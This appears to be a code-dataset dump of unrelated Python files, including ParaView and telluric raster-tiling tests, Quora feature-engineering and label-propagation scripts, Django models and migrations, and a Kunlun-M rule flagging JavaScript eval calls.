pythonCalculator1 = PythonCalculator(Input=wavelet2)
pythonCalculator1.ArrayName = 'RTData'
pythonCalculator1.Expression = 'RTData+200'
pythonCalculator1.CopyArrays = 0
# this one should be ignored in the output since it has a different
# number of points and cells than the first one
sphereSource = Sphere()
appendAttributes1 = AppendAttributes(Input=[wavelet1, sphereSource, pythonCalculator1])
appendAttributes1.UpdatePipeline()
if appendAttributes1.PointData.GetNumberOfArrays() != 2:
    # should have RTData and RTData_input_2 (the sphere input is skipped)
print("ERROR: wrong number of arrays ", appendAttributes1.PointData.GetNumberOfArrays())
sys.exit(1)
arrayRange = appendAttributes1.PointData['RTData'].GetRange()
if arrayRange[0] < 37 or arrayRange[0] > 38 or arrayRange[1] < 276 or arrayRange[1] > 277:
print("ERROR: RTData has wrong array range ", arrayRange)
sys.exit(1)
arrayRange = appendAttributes1.PointData['RTData_input_2'].GetRange()
if arrayRange[0] < 237 or arrayRange[0] > 238 or arrayRange[1] < 476 or arrayRange[1] > 477:
print("ERROR: RTData_input_2 has wrong array range ", arrayRange)
sys.exit(1)
# now try with the can.ex2 exodus file for multiblock testing
for i, arg in enumerate(sys.argv):
if arg == "-D" and i+1 < len(sys.argv):
dataFile = sys.argv[i+1] + '/Testing/Data/can.ex2'
canex2 = ExodusIIReader(FileName=[dataFile])
canex2.ElementVariables = ['EQPS']
canex2.PointVariables = ['DISPL', 'VEL', 'ACCL']
canex2.GlobalVariables = ['KE', 'XMOM', 'YMOM', 'ZMOM', 'NSTEPS', 'TMSTEP']
calculator1 = Calculator(Input=canex2)
calculator1.AttributeType = 'Point Data'
calculator1.CoordinateResults = 0
calculator1.ResultNormals = 0
calculator1.ResultTCoords = 0
calculator1.ReplaceInvalidResults = 1
calculator1.ReplacementValue = 0.0
calculator1.ResultArrayName = 'VEL_X'
calculator1.Function = 'VEL_X+100'
appendAttributes2 = AppendAttributes(Input=[canex2, calculator1])
appendAttributes2.UpdatePipeline()
print("success")
| 35.862069
| 92
| 0.755288
|
from paraview.simple import *
import sys
wavelet1 = Wavelet()
wavelet2 = Wavelet()
pythonCalculator1 = PythonCalculator(Input=wavelet2)
pythonCalculator1.ArrayName = 'RTData'
pythonCalculator1.Expression = 'RTData+200'
pythonCalculator1.CopyArrays = 0
sphereSource = Sphere()
appendAttributes1 = AppendAttributes(Input=[wavelet1, sphereSource, pythonCalculator1])
appendAttributes1.UpdatePipeline()
if appendAttributes1.PointData.GetNumberOfArrays() != 2:
print("ERROR: wrong number of arrays ", appendAttributes1.PointData.GetNumberOfArrays())
sys.exit(1)
arrayRange = appendAttributes1.PointData['RTData'].GetRange()
if arrayRange[0] < 37 or arrayRange[0] > 38 or arrayRange[1] < 276 or arrayRange[1] > 277:
print("ERROR: RTData has wrong array range ", arrayRange)
sys.exit(1)
arrayRange = appendAttributes1.PointData['RTData_input_2'].GetRange()
if arrayRange[0] < 237 or arrayRange[0] > 238 or arrayRange[1] < 476 or arrayRange[1] > 477:
print("ERROR: RTData_input_2 has wrong array range ", arrayRange)
sys.exit(1)
for i, arg in enumerate(sys.argv):
if arg == "-D" and i+1 < len(sys.argv):
dataFile = sys.argv[i+1] + '/Testing/Data/can.ex2'
canex2 = ExodusIIReader(FileName=[dataFile])
canex2.ElementVariables = ['EQPS']
canex2.PointVariables = ['DISPL', 'VEL', 'ACCL']
canex2.GlobalVariables = ['KE', 'XMOM', 'YMOM', 'ZMOM', 'NSTEPS', 'TMSTEP']
calculator1 = Calculator(Input=canex2)
calculator1.AttributeType = 'Point Data'
calculator1.CoordinateResults = 0
calculator1.ResultNormals = 0
calculator1.ResultTCoords = 0
calculator1.ReplaceInvalidResults = 1
calculator1.ReplacementValue = 0.0
calculator1.ResultArrayName = 'VEL_X'
calculator1.Function = 'VEL_X+100'
appendAttributes2 = AppendAttributes(Input=[canex2, calculator1])
appendAttributes2.UpdatePipeline()
print("success")
| true
| true
|
790dbb66da0d930c4aacd463d876583994ead967
| 182
|
py
|
Python
|
python_ex/01ex.py
|
llinmeng/PythonStudy
|
68c27eaa302b95aa4fb35d794f0d645f98b832dd
|
[
"MIT"
] | null | null | null |
python_ex/01ex.py
|
llinmeng/PythonStudy
|
68c27eaa302b95aa4fb35d794f0d645f98b832dd
|
[
"MIT"
] | null | null | null |
python_ex/01ex.py
|
llinmeng/PythonStudy
|
68c27eaa302b95aa4fb35d794f0d645f98b832dd
|
[
"MIT"
] | null | null | null |
print "Hello World!"
print "Hello Again"
print "I like typing this."
print "This is fun."
print "Yay! Printing"
print "Id much rather you 'not'."
print 'I "said" do not touch this.'
| 22.75
| 35
| 0.697802
|
print "Hello World!"
print "Hello Again"
print "I like typing this."
print "This is fun."
print "Yay! Printing"
print "Id much rather you 'not'."
print 'I "said" do not touch this.'
| false
| true
|
790dbc3fe1067ad92b9c1bc56af87986404f11fa
| 202
|
py
|
Python
|
services/resource/project/utils/enums.py
|
spruce-cq/sblog
|
287571bffcf19c224d3b4ad4e4e9347225245350
|
[
"MIT"
] | null | null | null |
services/resource/project/utils/enums.py
|
spruce-cq/sblog
|
287571bffcf19c224d3b4ad4e4e9347225245350
|
[
"MIT"
] | 7
|
2020-09-07T15:06:12.000Z
|
2022-02-26T19:09:01.000Z
|
services/resource/project/utils/enums.py
|
spruce-cq/sblog
|
287571bffcf19c224d3b4ad4e4e9347225245350
|
[
"MIT"
] | null | null | null |
# services/resource/project/utils/enums.py
from enum import Enum
class Status(Enum):
normal = 0
delete = 1
other = 2
class Scope(Enum):
user = 'UserScope'
admin = 'AdminScope'
| 12.625
| 42
| 0.643564
|
from enum import Enum
class Status(Enum):
normal = 0
delete = 1
other = 2
class Scope(Enum):
user = 'UserScope'
admin = 'AdminScope'
| true
| true
|
790dbc43e17a08ab4288c2517635a930ec91e743
| 1,594
|
py
|
Python
|
quora/pyfm/generate_interaction.py
|
zonemercy/Kaggle
|
35ecb08272b6491f5e6756c97c7dec9c46a13a43
|
[
"MIT"
] | 17
|
2017-10-01T00:10:19.000Z
|
2022-02-07T12:11:01.000Z
|
quora/pyfm/generate_interaction.py
|
zonemercy/Kaggle
|
35ecb08272b6491f5e6756c97c7dec9c46a13a43
|
[
"MIT"
] | null | null | null |
quora/pyfm/generate_interaction.py
|
zonemercy/Kaggle
|
35ecb08272b6491f5e6756c97c7dec9c46a13a43
|
[
"MIT"
] | 1
|
2019-08-15T03:58:51.000Z
|
2019-08-15T03:58:51.000Z
|
import os
import numpy as np
import pandas as pd
from sklearn.preprocessing import OneHotEncoder,LabelEncoder,StandardScaler
from sklearn.decomposition import TruncatedSVD,PCA
from sklearn.metrics.pairwise import cosine_similarity,pairwise_distances
from sklearn.feature_extraction.text import TfidfVectorizer
SEED = 2048
np.random.seed(SEED)
PATH = os.path.expanduser("~") + "/data/quora/"
train = pd.read_csv(PATH + "train_porter.csv")#, nrows=5000)
test = pd.read_csv(PATH + "test_porter.csv")#, nrows=5000)
test['is_duplicated'] = [-1]*test.shape[0]
len_train = train.shape[0]
data_all = pd.concat([train,test])
def calc_set_intersection(obj,target):
a = set(obj.split())
b = set(target.split())
return (len(a.intersection(b))*1.0) / (len(a)*1.0)
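# Illustrative note (not in the original script): the ratio is taken relative
# to the first argument's token set, so the function is asymmetric, e.g.
#   calc_set_intersection("a b c", "b c d")   -> 2/3
#   calc_set_intersection("b c d", "a b c d") -> 3/3 = 1.0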
print('Generate intersection')
train_interaction = train.astype(str).apply(lambda x: calc_set_intersection(x['question1'],x['question2']),axis=1)
test_interaction = test.astype(str).apply(lambda x: calc_set_intersection(x['question1'],x['question2']),axis=1)
pd.to_pickle(train_interaction,PATH+"train_interaction.pkl")
pd.to_pickle(test_interaction,PATH+"test_interaction.pkl")
print('Generate porter intersection')
train_porter_interaction = train.astype(str).apply(lambda x:calc_set_intersection(x['question1_porter'],x['question2_porter']),axis=1)
test_porter_interaction = test.astype(str).apply(lambda x:calc_set_intersection(x['question1_porter'],x['question2_porter']),axis=1)
pd.to_pickle(train_porter_interaction, PATH+"train_porter_interaction.pkl")
pd.to_pickle(test_porter_interaction, PATH+"test_porter_interaction.pkl")
| 45.542857
| 134
| 0.788582
|
import os
import numpy as np
import pandas as pd
from sklearn.preprocessing import OneHotEncoder,LabelEncoder,StandardScaler
from sklearn.decomposition import TruncatedSVD,PCA
from sklearn.metrics.pairwise import cosine_similarity,pairwise_distances
from sklearn.feature_extraction.text import TfidfVectorizer
SEED = 2048
np.random.seed(SEED)
PATH = os.path.expanduser("~") + "/data/quora/"
train = pd.read_csv(PATH + "train_porter.csv")
test = pd.read_csv(PATH + "test_porter.csv")
test['is_duplicated'] = [-1]*test.shape[0]
len_train = train.shape[0]
data_all = pd.concat([train,test])
def calc_set_intersection(obj,target):
a = set(obj.split())
b = set(target.split())
return (len(a.intersection(b))*1.0) / (len(a)*1.0)
print('Generate intersection')
train_interaction = train.astype(str).apply(lambda x: calc_set_intersection(x['question1'],x['question2']),axis=1)
test_interaction = test.astype(str).apply(lambda x: calc_set_intersection(x['question1'],x['question2']),axis=1)
pd.to_pickle(train_interaction,PATH+"train_interaction.pkl")
pd.to_pickle(test_interaction,PATH+"test_interaction.pkl")
print('Generate porter intersection')
train_porter_interaction = train.astype(str).apply(lambda x:calc_set_intersection(x['question1_porter'],x['question2_porter']),axis=1)
test_porter_interaction = test.astype(str).apply(lambda x:calc_set_intersection(x['question1_porter'],x['question2_porter']),axis=1)
pd.to_pickle(train_porter_interaction, PATH+"train_porter_interaction.pkl")
pd.to_pickle(test_porter_interaction, PATH+"test_porter_interaction.pkl")
| true
| true
|
790dbd0078150244cae8de4b721c0c6c27361515
| 779
|
py
|
Python
|
src/classification/predict_with_umap.py
|
menchelab/UMAPanalysis
|
09f9b4a7823f6eceb6b40e25ee21412f3bf1c7fe
|
[
"MIT"
] | 2
|
2022-02-27T19:19:36.000Z
|
2022-03-15T10:38:36.000Z
|
src/classification/predict_with_umap.py
|
menchelab/UMAPanalysis
|
09f9b4a7823f6eceb6b40e25ee21412f3bf1c7fe
|
[
"MIT"
] | null | null | null |
src/classification/predict_with_umap.py
|
menchelab/UMAPanalysis
|
09f9b4a7823f6eceb6b40e25ee21412f3bf1c7fe
|
[
"MIT"
] | null | null | null |
import sys
import re
import pandas as pd
import networkx as nx
network_filename = sys.argv[1]
m = re.match("networks/(?P<dataset>.*?)_similarity", network_filename)
dataset = m.groupdict()['dataset']
G=nx.read_gml(network_filename)
labels=pd.read_csv(f"munged_data/{dataset}/labels.csv", index_col=0)
metadata = pd.read_csv(f"data/intermediate/{dataset}/metadata.csv", index_col=0)
features = pd.read_csv(f"data/intermediate/{dataset}/features.csv", index_col=0)
train = pd.read_csv(f"data/intermediate/{dataset}/train.csv", header = None)[0].values
# Assumption: labels outside the training split are held out (zeroed)
testing = pd.Series({i: (i not in train) for i in labels.index})
labels = labels.mask(testing, other=0)
# make_propagator and propagate are assumed to come from a project-local
# helper module (they are not defined in this script)
propagator, nodes = make_propagator(G)
df, df_time = propagate(propagator, nodes, labels)
df.to_csv(f"predictions/{dataset}/predicted_by_propagation.csv")
| 33.869565
| 86
| 0.762516
|
import sys
import re
import pandas as pd
import networkx as nx
network_filename = sys.argv[1]
m = re.match("networks/(?P<dataset>.*?)_similarity", network_filename)
dataset = m.groupdict()['dataset']
G=nx.read_gml(network_filename)
labels=pd.read_csv(f"munged_data/{dataset}/labels.csv", index_col=0)
metadata = pd.read_csv(f"data/intermediate/{dataset}/metadata.csv", index_col=0)
features = pd.read_csv(f"data/intermediate/{dataset}/features.csv", index_col=0)
train = pd.read_csv(f"data/intermediate/{dataset}/train.csv", header = None)[0].values
testing = pd.Series({i: (i not in train) for i in labels.index})
labels = labels.mask(testing, other=0)
propagator, nodes = make_propagator(G)
df, df_time = propagate(propagator, nodes, labels)
df.to_csv(f"predictions/{dataset}/predicted_by_propagation.csv")
| true
| true
|
790dbdcf0a9d7aaa327e40cf4253ecb288613544
| 596
|
py
|
Python
|
keyword_relation/migrations/0011_keyword_grouping.py
|
rohanjsuresh/extracted_keyword_validation
|
94e56c645c066d9d20097433b1716b3e76625b3d
|
[
"MIT"
] | null | null | null |
keyword_relation/migrations/0011_keyword_grouping.py
|
rohanjsuresh/extracted_keyword_validation
|
94e56c645c066d9d20097433b1716b3e76625b3d
|
[
"MIT"
] | null | null | null |
keyword_relation/migrations/0011_keyword_grouping.py
|
rohanjsuresh/extracted_keyword_validation
|
94e56c645c066d9d20097433b1716b3e76625b3d
|
[
"MIT"
] | 1
|
2021-05-18T16:40:55.000Z
|
2021-05-18T16:40:55.000Z
|
# Generated by Django 3.0.8 on 2021-07-07 22:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('keyword_relation', '0010_auto_20210322_2049'),
]
operations = [
migrations.CreateModel(
name='Keyword_Grouping',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('keyword', models.CharField(max_length=512)),
('group', models.IntegerField(default=-1)),
],
),
]
| 27.090909
| 114
| 0.588926
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('keyword_relation', '0010_auto_20210322_2049'),
]
operations = [
migrations.CreateModel(
name='Keyword_Grouping',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('keyword', models.CharField(max_length=512)),
('group', models.IntegerField(default=-1)),
],
),
]
| true
| true
|
790dbe9c2575b584fcde93e4a4489e80e4e28895
| 1,455
|
py
|
Python
|
xlsxwriter/test/comparison/test_chart_scatter03.py
|
Rippling/XlsxWriter-1
|
be8d1cb8f8b156cf87bbe5d591f1f5475804be44
|
[
"BSD-2-Clause"
] | null | null | null |
xlsxwriter/test/comparison/test_chart_scatter03.py
|
Rippling/XlsxWriter-1
|
be8d1cb8f8b156cf87bbe5d591f1f5475804be44
|
[
"BSD-2-Clause"
] | null | null | null |
xlsxwriter/test/comparison/test_chart_scatter03.py
|
Rippling/XlsxWriter-1
|
be8d1cb8f8b156cf87bbe5d591f1f5475804be44
|
[
"BSD-2-Clause"
] | null | null | null |
###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_scatter03.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'scatter', 'subtype': 'straight'})
chart.axis_ids = [54010624, 45705856]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$B$1:$B$5'})
chart.add_series({'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$C$1:$C$5',
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
| 26.454545
| 79
| 0.538832
| true
| true
|
|
790dbf8c0033ff8b410ae68d704d1f7f043f9f53
| 1,090
|
py
|
Python
|
rules/javascript/CVI_3003.py
|
dahua966/Kunlun-M
|
978dd0650b555a677d2c5d74fc86ff66319a2d57
|
[
"MIT"
] | 1
|
2021-06-25T01:44:45.000Z
|
2021-06-25T01:44:45.000Z
|
rules/javascript/CVI_3003.py
|
dahua966/Kunlun-M
|
978dd0650b555a677d2c5d74fc86ff66319a2d57
|
[
"MIT"
] | null | null | null |
rules/javascript/CVI_3003.py
|
dahua966/Kunlun-M
|
978dd0650b555a677d2c5d74fc86ff66319a2d57
|
[
"MIT"
] | 2
|
2020-12-09T08:26:45.000Z
|
2021-04-12T03:24:34.000Z
|
# -*- coding: utf-8 -*-
"""
auto rule template
~~~~
:author: LoRexxar <LoRexxar@gmail.com>
:homepage: https://github.com/LoRexxar/Kunlun-M
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 LoRexxar. All rights reserved
"""
from utils.api import *
class CVI_3003():
"""
rule class
"""
def __init__(self):
self.svid = 3003
self.language = "javascript"
self.author = "LoRexxar"
self.vulnerability = "RCE"
self.description = "remote? code exec"
# status
self.status = True
        # partial configuration
self.match_mode = "function-param-regex"
self.match = r"eval|setTimeout"
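        # Illustrative only (not from the original rule): with this match_mode
        # the scanner inspects the parameters of matched calls, e.g. flagging
        # eval(userInput) or setTimeout(taintedString, 100) in JS sources.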
# for solidity
self.match_name = None
self.black_list = None
# for chrome ext
self.keyword = None
# for regex
self.unmatch = None
self.vul_function = None
def main(self, regex_string):
"""
regex string input
:regex_string: regex match string
:return:
"""
pass
| 20.185185
| 64
| 0.555046
|
from utils.api import *
class CVI_3003():
def __init__(self):
self.svid = 3003
self.language = "javascript"
self.author = "LoRexxar"
self.vulnerability = "RCE"
self.description = "remote? code exec"
self.status = True
self.match_mode = "function-param-regex"
self.match = r"eval|setTimeout"
self.match_name = None
self.black_list = None
self.keyword = None
self.unmatch = None
self.vul_function = None
def main(self, regex_string):
pass
| true
| true
|
790dc041534631695a4a573017e279551b20bf64
| 24,594
|
py
|
Python
|
tests/test_georaster_tiling.py
|
SimoneDeGasperis/telluric
|
2fe4388f4a69a5a939078a876943c5f4620693ca
|
[
"MIT"
] | 81
|
2018-04-12T12:29:06.000Z
|
2022-03-17T09:41:55.000Z
|
tests/test_georaster_tiling.py
|
SimoneDeGasperis/telluric
|
2fe4388f4a69a5a939078a876943c5f4620693ca
|
[
"MIT"
] | 283
|
2018-04-09T11:32:25.000Z
|
2022-03-25T22:16:38.000Z
|
tests/test_georaster_tiling.py
|
SimoneDeGasperis/telluric
|
2fe4388f4a69a5a939078a876943c5f4620693ca
|
[
"MIT"
] | 22
|
2018-04-09T10:53:52.000Z
|
2022-02-09T10:38:33.000Z
|
import os
import rasterio
import mercantile
import numpy as np
import pytest
from tempfile import NamedTemporaryFile, TemporaryDirectory
from affine import Affine
from unittest import TestCase
from unittest.mock import patch
from datetime import datetime
from shapely.geometry import Polygon
from rasterio.enums import Resampling
from rasterio.windows import Window
from rasterio.crs import CRS
from telluric import GeoRaster2, GeoVector
from telluric.constants import WEB_MERCATOR_CRS, WGS84_CRS
from telluric.georaster import MERCATOR_RESOLUTION_MAPPING, GeoRaster2Error, GeoRaster2IOError
from telluric.util.general import convert_resolution_from_meters_to_deg
import sys
import logging
import tempfile
log = logging.getLogger('rasterio._gdal')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
manualtest = pytest.mark.skipif("TEST_MANUAL" not in os.environ, reason="skip on auto testing")
window_data = pytest.mark.skip('pending decision on consistency in results between rasterio read and reproject')
framing = pytest.mark.skip('waiting for framing and get_window with boundless false')
tiles = {
10: (579, 394, 10),
11: (1159, 789, 11),
12: (2319, 1578, 12),
14: (9277, 6312, 14),
15: (18554, 12624, 15),
17: (74216, 50496, 17),
18: (148433, 100994, 18)
}
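# Each value above is an (x, y, zoom) XYZ tile; for example,
# mercantile.xy_bounds(*tiles[10]) yields that tile's Web Mercator
# (left, bottom, right, top) bounds, as used in the crop tests below.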
class GeoRaster2TilesTestGeneral(TestCase):
"""GeoRaster2 Tiles general tests."""
def test_raise_exception_on_bad_file_path(self):
vr = GeoRaster2.open('stam')
with self.assertRaises(GeoRaster2IOError):
vr.get_tile(1, 2, 3)
def test_raise_exception_on_bad_raster_url(self):
vr = GeoRaster2.open('http://stam')
with self.assertRaises(GeoRaster2IOError):
vr.get_tile(1, 2, 3)
def test_raise_exception_on_bad_file_path_save_cog(self):
vr = GeoRaster2.open('stam')
with self.assertRaises(GeoRaster2IOError):
vr.save_cloud_optimized('dest_file')
def test_raise_exception_on_bad_raster_url_save_cog(self):
vr = GeoRaster2.open('http://stam')
with self.assertRaises(GeoRaster2IOError):
vr.save_cloud_optimized('dest_file')
class BaseGeoRasterTestCase(TestCase):
@classmethod
def setUpClass(cls):
path = "./tests/data/raster/raster_for_test.tif"
cls.read_only_vgr = GeoRaster2.open(path)
path = "./tests/data/raster/raster_wgs84.tif"
cls.read_only_vgr_wgs84 = GeoRaster2.open(path)
def read_only_virtual_geo_raster(self):
return self.read_only_vgr
def read_only_virtual_geo_raster_wgs84(self):
return self.read_only_vgr_wgs84
class GeoRaster2TestGetTile(BaseGeoRasterTestCase):
"""GeoRaster2 get tile tests."""
def test_geo_bounding_tile(self):
gr = self.read_only_virtual_geo_raster()
gv = gr.footprint().reproject(WGS84_CRS)
bounding_tile = mercantile.bounding_tile(*gv.get_shape(gv.crs).bounds)
self.assertEqual(bounding_tile, (37108, 25248, 16))
@patch.object(GeoRaster2, 'crop')
def test_fails_with_empty_raster_for_tile_out_of_raster_area(self, mock__crop):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
r = raster.get_tile(16384, 16383, 15)
self.assertTrue((r.image.data == 0).all())
self.assertTrue((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
self.assertEqual(r.crs, WEB_MERCATOR_CRS)
mock__crop.assert_not_called()
def test_get_all_raster_in_a_single_tile(self):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
p = raster.footprint().reproject(WGS84_CRS).centroid
r = raster.get_tile(*mercantile.tile(lng=p.x, lat=p.y, zoom=11))
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
self.assertEqual(r.crs, WEB_MERCATOR_CRS)
def test_get_tile_for_different_zoom_levels(self):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
for zoom in tiles:
r = raster.get_tile(*tiles[zoom])
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_tile_from_different_crs_tile_is_not_tilted(self):
raster = self.read_only_virtual_geo_raster_wgs84()
r = raster.get_tile(*tiles[18])
self.assertEqual(1, len(np.unique(r.image.mask)))
    def test_get_tile_from_different_crs_tile_is_not_tilted_with_different_buffer(self):
        raster = self.read_only_virtual_geo_raster_wgs84()
        os.environ["TELLURIC_GET_TILE_BUFFER"] = "0"
        try:
            r = raster.get_tile(*tiles[18])
        finally:
            # ensure the env override is always removed, even on success
            del os.environ["TELLURIC_GET_TILE_BUFFER"]
        self.assertEqual(2, len(np.unique(r.image.mask)))
def test_get_entire_all_raster(self):
vr = self.read_only_virtual_geo_raster()
roi = GeoVector.from_xyz(37108, 25248, 16)
r = vr.crop(roi)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.shape, (3, 612, 612))
def test_fails_with_empty_raster_for_tile_out_of_raster_area_with_no_tile_size(self):
vr = self.read_only_virtual_geo_raster()
roi = GeoVector.from_xyz(16384, 16383, 15)
r = vr.crop(roi)
self.assertTrue((r.image.data == 0).all())
self.assertTrue((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 1223, 1223))
def test_get_window_of_full_resolution(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 300)
r = vr.get_window(win)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 300, 300))
def test_get_window_resize_to_256(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 300)
r = vr.get_window(win, xsize=256, ysize=256)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_window_of_non_square_resize_to_256(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, xsize=256, ysize=256)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_window_of_non_square_keeps_size_proportions_for_give_xsize(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, xsize=150)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 200, 150))
def test_get_window_of_non_square_keeps_size_proportions_for_give_ysize(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, ysize=200)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 200, 150))
def test_get_window_width_height_correctness(self):
# See https://publicgitlab.satellogic.com/telluric/telluric/issues/58
vr = self.read_only_virtual_geo_raster()
expected_height = 200
win = Window(0, vr.height - expected_height, 1, expected_height)
r = vr.get_window(win)
self.assertEqual(r.image.shape, (3, expected_height, 1))
class GeoRasterCropTest(BaseGeoRasterTestCase):
metric_affine = Affine(1, 0.0, 2653750, 0.0, -1, 4594461)
def test_crop_in_memory_and_off_memory_without_resizing_are_the_same(self):
coords = mercantile.xy_bounds(*tiles[18])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster2 = GeoRaster2.open(rf.name)
off_memory_crop = raster2.crop(shape)
# load the image data
raster2.image
in_memory_crop = raster2.crop(shape)
self.assertEqual(off_memory_crop, in_memory_crop)
@window_data
def test_crop_and_get_tile_do_the_same(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster2 = GeoRaster2.open(rf.name)
tile15 = raster2.get_tile(*tiles[15])
# load the image data
raster2.image
cropped15 = raster2.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped15)
@window_data
def test_crop_and_get_tile_do_the_same_when_image_is_populated(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
tile15 = raster.get_tile(*tiles[15])
raster._populate_from_rasterio_object(read_image=True)
cropped_15 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped_15)
@window_data
def test_crop_image_from_and_get_win_do_the_same_with_resize(self):
bounds = (2, 3, 4, 5)
win = rasterio.windows.Window(bounds[0], bounds[1], bounds[2] - bounds[0], bounds[3] - bounds[1])
xsize = round((bounds[2] - bounds[0]) / 2)
ysize = round((bounds[3] - bounds[1]) / 2)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster.save('area.tif', tags={'AREA_OR_POINT': 'Area'})
raster.save('point.tif', tags={'AREA_OR_POINT': 'Point'})
saved_raster = GeoRaster2.open(rf.name)
cropped_win = saved_raster.get_window(win, xsize=xsize, ysize=ysize)
saved_raster_area = GeoRaster2.open('area.tif')
cropped_win_area = saved_raster_area.get_window(win, xsize=xsize, ysize=ysize)
saved_raster_point = GeoRaster2.open('point.tif')
cropped_win_point = saved_raster_point.get_window(win, xsize=xsize, ysize=ysize)
cropped_image = raster._crop(bounds, xsize=xsize, ysize=ysize)
print('cropped_win_area pixels\n', cropped_win_area.image)
print('cropped_win_point pixels\n', cropped_win_point.image)
print('cropped_win pixels\n', cropped_win.image)
print('cropped_image pixels\n', cropped_image.image)
if (cropped_win_point == cropped_win_area):
print('point == area')
if (cropped_image == cropped_win_area):
print('image == area')
if (cropped_image == cropped_win_point):
print('image == point')
if (cropped_win == cropped_win_area):
print('win == area')
if (cropped_win == cropped_win_point):
print('win == point')
self.assertEqual(cropped_image, cropped_win)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_high_zoom(self):
coords = mercantile.xy_bounds(*tiles[17])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile17 = raster.get_tile(*tiles[17])
cropped_17 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[17])
self.assertEqual(tile17, cropped_17)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_mid_zoom(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile15 = raster.get_tile(*tiles[15])
cropped_15 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped_15)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_for_low_zoom(self):
coords = mercantile.xy_bounds(*tiles[11])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
